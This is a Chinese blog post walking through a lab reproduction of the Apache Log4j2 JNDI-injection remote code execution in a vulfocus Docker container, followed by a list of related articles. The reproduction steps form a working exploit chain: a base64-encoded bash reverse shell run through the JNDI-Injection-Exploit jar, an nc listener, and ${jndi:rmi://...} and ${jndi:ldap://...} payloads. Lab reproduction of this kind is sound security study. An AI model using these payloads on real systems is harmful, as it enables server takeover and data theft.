【4】Apache Log4j2远程代码执行(2021.12.10)

已于 2023-11-02 13:59:19 修改
阅读量1.9k 收藏 2
点赞数 2
分类专栏: # 漏洞验证与利用 文章标签: java
于 2021-12-10 21:49:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunjikui1255326447/article/details/121865566
版权
0x01 漏洞描述
    Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。
   Log4j-2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。鉴于此漏洞危害较大,建议客户尽快采取措施防护此漏洞。
0x02 漏洞版本
Apache Log4j 2.x < 2.15.0-rc2
0x03 环境搭建
1.使用 docker 拉取漏洞镜像 
docker pull vulfocus/log4j2-rce-2021-12-09:latest
2.查看漏洞镜像并开启环境 
docker images

docker run -d -P vulfocus/log4j2-rce-2021-12-09
3.访问漏洞环境,,环境搭建完成 
http://192.168.189.195:32770
0x04 漏洞复现
1.开启ldap和rmi服务  
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4OS4xMzQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.189.195"
2.开启nc监听
nc -lvp 9999
3.使用火狐浏览器进行验证
payloadL: 
payload=${jndi: rmi://192.168.189.134:1099/zqueiv}
4.查看 nc反弹shell,反弹shell
0x05 漏洞复现
poc 的是直接生成一个txt,然后访问,若是存在则漏洞存在,负责不存在.
exp 就直接getshell 吧.
司徒荆
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Log4j-漏洞复现(CVE-2021-44228)
千寻的博客
12-22 3136
文章目录漏洞描述漏洞编号影响范围FOFA环境搭建漏洞复现漏洞复现-反弹shell参考连接摘抄 漏洞描述 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。 该工具重写了Log4j框架,并且引入了大量丰富的特性。 我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 该日志框架被大量用于业务系统开发,用来记录日志信息。 Apace在其2.0到2.14.1版本中存在一
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
Apache Log4j2 远程代码执行
qq_43679531的博客
01-21 3181
iptables -I INPUT -p tcp --dport 9999 -j ACCEPT iptables -I INPUT -p tcp --dport 1099 -j ACCEPT iptables -I INPUT -p tcp --dport 8180 -j ACCEPT iptables -I INPUT -p tcp --dport 1389 -j ACCEPT 工具 链接:百度网盘 请输入提取码 提取码:6ldj java -jar JNDI-Injectio..
log4j2-rce-2021-12-09漏洞原理及复现
qq_50854662的博客
10-15 912
log4j2-rce-2021-12-09漏洞原理及复现
2024年最全分析Apache Log4j2 远程代码执行漏洞_log4j2漏洞2,2024年最新2024年冲刺年薪40w
最新发布
2401_84544363的博客
05-11 817
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
log4j2 JNDI注入复现
qq_20504373的博客
12-14 6437
复现现象: 这个镜像使用了log4j2用来当做靶机程序 1、拉取一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09 2、跑起来docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 3、进入这个平台 https://log.xn–9tr.com/ 点击获取一个域名 4、执行一个post curl -X POST -F “payload=${jndi:ldap://
Log4J2远程代码执行漏洞修复20211210.rar
12-13
然而,在2021年12月,研究人员发现了一个高危的远程代码执行漏洞,该漏洞存在于Log4J2的JNDI(Java Naming and Directory Interface)查找功能中。当应用程序接收到包含恶意构造的字符串并将其记录时,攻击者可以...
apache-log4j-2.15.0-rc2-bin.zip
12-10
Apache Log4j 2.15.0-rc2 是一个重要的更新,主要针对已知的安全漏洞进行修复,特别是远程代码执行(RCE)漏洞。Log4j 是一个广泛使用的Java日志框架,由Apache软件基金会开发。它允许开发者记录应用程序运行时的...
log4j-2.15.0-rc2.tar.gz
12-10
然而,在2021年12月初,一个严重的安全漏洞被发现,即CVE-2021-44228,这个漏洞被称为“Log4Shell”,它允许远程代码执行(RCE),对使用Log4j 2.x版本的系统构成了重大威胁。 此漏洞源于Log4j中的JNDI(Java ...
log4j远程执行漏洞,测试源码
12-22
2021年12月,研究人员发现了一个允许任意代码执行的严重漏洞,它存在于Log4j 2的JNDI(Java Naming and Directory Interface)查找功能中。攻击者只需要在日志消息中插入特定的恶意格式字符串,就能触发远程代码执行...
Apache_Log4j2_RCE漏洞复现
Nailaoyyds的博客
04-24 4266
漏洞描述: Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 影响范围: Apache Log4j 2.x < 2.15.0-rc2 利用bugku中的题来
log4j中将日志发送到远程服务器
u010207995的博客
03-28 5722
1.服务端配置 1)服务端配置文件log4j-server.properties #Define a narrow log category. A category like debug will produce some extra logs also from server itself log4j.rootLogger=ERROR, file #Define how the socke
Log4j2远程命令执行(cve-2021-44228)复现
qq_39191052的博客
12-29 3656
目录 用vulfocus docker漏洞环境 漏洞复现-获取shell 用vulfocus docker漏洞环境 docker pull vulfocus/log4j2-rce-2021-12-09:latest ​ docker run -p 8080:8080 -d --name log4j2-rce vulfocus/log4j2-rce-2021-12-09 漏洞位置就是在 /hello。路径,请求方式POST 参数 payload。 漏洞复现-获取shell ...
Apache Log4j 复现靶场
hackzkaq的博客
12-14 3297
`搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具` 安全圈大动荡,新出现的漏洞危害性极大,此漏洞是可以执行任意代码,群里也流传了一句话:“这已经相当于黑客已经攻入计算机,可以为所欲为了“.很恐怖,一个漏洞的出现让多少人手忙脚乱。 新出了漏洞很多人都会想着去复现漏洞,为此掌控安全学院已经在12月10日15点上线了该漏洞靶场.点击文末”阅读原文“即可进入复现,亲测可以直接拿shell。切记要遵守网络安全法 靶场复现地址:https://hack.zkaq.cn/battle/target?id=5
【漏洞】log4j2远程执行代码复现实操代码例子
肉段_Dxd的博客
12-11 4305
关于近日log4j漏洞导致的远程执行代码的复现例子,利用JNDI的ldap攻击,使远程服务可能执行了恶意代码
Log4j-2命令执行复现及分析
weixin_46137328的博客
12-12 1017
0x00 漏洞描述Apache Log4j2是一个基于Java的日志记录框架。正常情况下,开发者可能会将错误信息写入日志中,可以利用此特点构造特殊的数据请求包,最终触发远程代码执行RCE漏...
Apache存在Log4j远程代码执行漏洞,严重危险级别
Mr、温少的博客
12-20 531
Apache存在Log4j远程代码执行漏洞,严重危险级别! 文章目录Apache存在Log4j远程代码执行漏洞,严重危险级别! 漏洞简述 2021-12-09,近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。 如果你的系统日志使用log4j实现,且版本大于 2.0, 日志打印内容中包含关键字 ${}, 其包含的内容会当做变量来进行替换,导致攻击者可以任意执行命令。(问题出在:1og4j-core.jar) 影响范围 Apache Log4j2 是一款优秀的
log4j2远程代码执行漏洞复现
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 1577
从漏洞曝出,因为从来就没有了解过jndi,所以花了有一天时间才搞出。 以下是简单教程。 1.pom.xml </dependency> <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core --> <dependency> <groupId>org.apache.logging.log4j</groupI.
apache log4j2 远程代码执行漏洞
06-28
Apache Log4j2存在远程代码执行漏洞,攻击者可以通过构造恶意请求,利用漏洞在受影响的服务器上执行任意代码,从而控制服务器或窃取敏感信息。该漏洞已被命名为CVE-2021-44228,建议用户尽快升级到最新版本以避免受...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值